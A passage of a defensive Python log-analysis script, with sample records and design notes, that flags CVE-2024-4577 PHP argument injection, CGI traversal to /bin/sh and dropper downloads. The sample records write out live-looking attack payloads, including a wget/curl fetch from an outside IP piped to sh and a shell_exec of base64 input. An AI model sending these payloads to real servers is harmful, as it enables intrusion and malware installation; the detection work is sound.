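    if len(text) < 16 or len(text) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+=*", text):
        return None
    try:
        out = base64.b64decode(text, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return out if all(c.isprintable() or c in "\r\n\t" for c in out) else None


def canary_confirmed(request_body: str, response_body: str) -> bool:
    """True when the response carries the MD5 the injected PHP was told to print,
    i.e. the target really executed the attacker's code."""
    return any(hashlib.md5(s.encode()).hexdigest() in response_body
               for s in CANARY_RE.findall(request_body))


def analyze(event: dict) -> dict:
    """Return sorted indicator tags, dropper hosts and an executed flag for one record."""
    hits, hosts = set(), set()
    if event.get("user_agent") == "libredtail-http":
        hits.add("ua:libredtail-http")
    path = unquote_to_bytes(event.get("path", "")).decode("latin-1")
    if ".." in path and path.endswith("/bin/sh"):           # CGI traversal to a shell
        hits.add("traversal:/bin/sh")
    query = best_fit_normalize(event.get("query", ""))
    for option in ARGINJ_RE.findall(query):                  # CVE-2024-4577 option injection
        hits.add("cve-2024-4577:" + option.lower())
    # Inspect the query, the body, and anything base64-encoded inside either of them.
    texts = [query, event.get("body", "")]
    for text in list(texts):
        texts += [d for d in map(try_b64, B64_RUN_RE.findall(text)) if d]
    for text in texts:
        for host in DROPPER_RE.findall(text):
            hosts.add(host)
            hits.add("dropper:" + host)
        if PIPE_TO_SH_RE.search(text):
            hits.add("pipe-to-sh")
        for vector in VECTOR_RE.findall(text):
            hits.add("vector:" + vector)
    return {"src": event.get("src"), "indicators": sorted(hits), "dropper_hosts": sorted(hosts),
            "executed": canary_confirmed(event.get("body", ""), event.get("response", ""))}


def dropper_hosts(events) -> list:
    """Union of dropper hosts across records: the addresses to block at the egress firewall."""
    return sorted({h for e in events for h in analyze(e)["dropper_hosts"]})


# Constructed sample records modelled on the diary's description (field names assumed).
SAMPLE_EVENTS = [
    {"src": "82.165.66.87", "method": "POST",                      # traversal to /bin/sh
     "path": "/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh", "query": "",
     "user_agent": "libredtail-http",
     "body": "(wget --no-check-certificate -qO- https://31.57.216.121/sh || "
             "curl -sk https://31.57.216.121/sh) | sh -s apache.selfrep",
     "response": "404 Not Found"},
    {"src": "82.165.66.87", "method": "POST", "path": "/index.php",  # CVE-2024-4577
     "query": "%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input",
     "user_agent": "libredtail-http",
     "body": '<?php echo(md5("Hello CVE-2024-4577")); echo shell_exec(base64_decode("'
             + CAPTURED_B64 + '"));',
     "response": hashlib.md5(b"Hello CVE-2024-4577").hexdigest()},  # what a vulnerable host echoes
    {"src": "2.27.53.96", "method": "POST",                        # PHPUnit probe (path assumed)
     "path": "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "query": "",
     "user_agent": "libredtail-http",
     "body": '<?php echo(md5("Hello PHPUnit"));', "response": "404 Not Found"},
    {"src": "198.51.100.7", "method": "GET", "path": "/", "query": "",  # benign request
     "user_agent": "Mozilla/5.0", "body": "", "response": "<html>ok</html>"},
]

if __name__ == "__main__":
    for record in SAMPLE_EVENTS:
        print(analyze(record))
    print("block these dropper hosts:", dropper_hosts(SAMPLE_EVENTS))
```

Two design points: the best-fit normalisation is done before matching, so a rule that only looks for the literal `-d` in the raw query (as a WAF signature might) would miss the `%AD` form that actually exploits CVE-2024-4577; and the `executed` flag is derived from the response, which is what separates a mere probe from a host that ran attacker code and is worth an incident ticket.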